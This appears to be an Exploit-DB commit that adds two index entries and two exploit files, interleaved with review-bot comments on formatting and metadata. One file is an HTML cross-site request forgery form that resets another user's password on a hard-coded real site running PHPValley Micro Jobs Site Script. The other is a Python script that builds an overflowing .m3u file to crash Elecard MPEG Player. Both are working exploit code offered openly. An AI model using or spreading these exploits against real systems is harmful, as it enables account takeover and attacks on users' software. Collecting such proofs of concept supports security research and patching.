DB: 2015-10-21

2 new exploits
Offensive Security 2015-10-21 05:03:41 +00:00
parent 6f9c84b590
commit 0d57239a9a
3 changed files with 52 additions and 0 deletions


@ -34773,3 +34773,5 @@ id,file,description,date,author,platform,type,port
38495,platforms/hardware/remote/38495.html,"Belkin F5D8236-4 Router Cross Site Request Forgery Vulnerability",2013-04-25,"Jacob Holcomb",hardware,remote,0
38496,platforms/php/webapps/38496.txt,"RealtyScript 4.0.2 - Multiple CSRF And Persistent XSS Vulnerabilities",2015-10-19,LiquidWorm,php,webapps,0
38497,platforms/php/webapps/38497.txt,"RealtyScript 4.0.2 - Multiple Time-based Blind SQL Injection Vulnerabilities",2015-10-19,LiquidWorm,php,webapps,0
38498,platforms/windows/dos/38498.py,"Elecard MPEG Player '.m3u' File Buffer Overflow Vulnerability",2013-04-27,metacom,windows,dos,0
38499,platforms/php/webapps/38499.html,"PHPValley Micro Jobs Site Script Spoofing Vulnerability",2013-04-27,"Jason Whelan",php,webapps,0
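
Review bot: The two added rows (38498 and 38499) leave the affected version out of the description column, unlike the RealtyScript rows directly above them, which read "RealtyScript 4.0.2 - ...". The advisory text in the added files names Elecard MPEG Player 5.8 and PHPValley Micro Jobs Site Script 1.01, so consider adding those versions to the descriptions to keep the index searchable by version. Row 38498 is also typed dos while its own advisory text says arbitrary code execution is possible; confirm that this classification is intended.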



@ -0,0 +1,17 @@
source: http://www.securityfocus.com/bid/59536/info
PHPValley Micro Jobs Site Script is prone to a vulnerability that allows attackers to spoof another user.
Attackers can exploit this issue to spoof another user; other attacks are also possible.
PHPValley Micro Jobs Site Script 1.01 is vulnerable; other versions may also be affected.
<!-- be logged into your own account, edit info below: -->
<form method="post" action="http://webfiver.com/change_pass.php">
<input name="changepass" type="hidden" value="Update" />
Target Username: <input name="auser" type="text" />
Your Password: <input name="cpass" type="password" />
<input name="npass" type="hidden" value="jacked" />
<input name="npassc" type="hidden" value="jacked" />
<input type="submit" value="Jack" />
</form>
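
Review bot: The form's action attribute is hard-coded to http://webfiver.com/change_pass.php, a specific third-party host, so anyone who opens this file and submits the form sends a request there; replace the host with a neutral placeholder (for example http://TARGET/change_pass.php, a made-up name). The source: line and the advisory sentences above the HTML comment are bare text in an .html file and should be wrapped in a comment as well. The description "spoof another user" also does not state what the form shows, namely that the account name travels in the client-supplied auser field alongside the caller's own cpass; saying so would tell maintainers of the script which server-side check to review.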

platforms/windows/dos/38498.py Executable file

@ -0,0 +1,33 @@
source: http://www.securityfocus.com/bid/59534/info
Elecard MPEG Player is prone to a buffer-overflow vulnerability because the application fails to bounds-check user-supplied data before copying it into an insufficiently sized buffer.
Attackers can execute arbitrary code in the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.
Elecard MPEG Player 5.8 is vulnerable; other versions may also be affected.
#!/usr/bin/python
# Exploit Title:Elecard MPEG Player 5.8 Local PoC
# Download link :www.elecard.com/assets/files/distribs/mpeg-player/EMpgPlayer.zip
# Product: Vulnerable
# Elecard MPEG Player,Elecard AVC HD Player
# RST
# Date (found): 27.04.2013
# Date (publish): 27.04.2013
# Author: metacom
# version:5.8.121004
# Category: poc
# Tested on: windows 7 German
head="#EXTM3U\n"
head+="#EXTINF:153,Artist - song\n"
filename= "elecard.m3u"
buffer= "\x41" * 783
buffer+="\x42" * 4
buffer+="\x43" * 4
buffer+="\x44" * 25000
textfile = open(filename , 'w')
textfile.write(head+buffer)
textfile.close()
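
Review bot: The source: line and the three advisory sentences at the top of this file are not commented, so a file recorded as an executable .py does not parse as Python, and #!/usr/bin/python sits below them instead of on line 1 where a shebang has to be. Prefix those header lines with # (or move them into a docstring) and put the shebang first. The comment header would also be clearer if it said that the script only writes elecard.m3u to the current directory, and the open/write/close sequence at the end could use a with block so the handle is closed on error.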